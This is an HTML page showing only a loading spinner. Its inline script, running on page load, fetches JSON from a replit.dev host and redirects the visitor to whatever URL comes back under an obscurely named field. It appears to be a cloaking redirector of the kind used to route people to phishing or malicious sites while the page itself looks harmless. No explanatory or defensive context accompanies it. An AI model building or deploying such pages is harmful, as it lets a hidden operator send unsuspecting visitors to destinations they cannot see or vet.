<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        body {
            background: #2c2c2c;
            color: #fff;
            font-family: 'Orbitron', sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }

        .loading-circle {
            border: 8px solid transparent;
            border-top: 8px solid #4a90e2;
            border-radius: 50%;
            width: 50px;
            height: 50px;
            animation: spin 1s linear infinite;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
    </style>
</head>
<body>
    <div class="loading-circle"></div>
    <script>
        fetch("https://745d9af6-f4c0-42d4-aff8-43db78165d02-00-1wcq1n320knr6.pike.replit.dev/", {
            "referrerPolicy": "strict-origin-when-cross-origin",
            "body": null,
            "method": "GET",
            "mode": "cors",
            "credentials": "omit"
        })
        .then(res => res.json())  
        .then(data => {
            if (data.vjmi) {
                window.location.href = data.vjmi;
            }
        })
    </script>
    
</body>
</html>
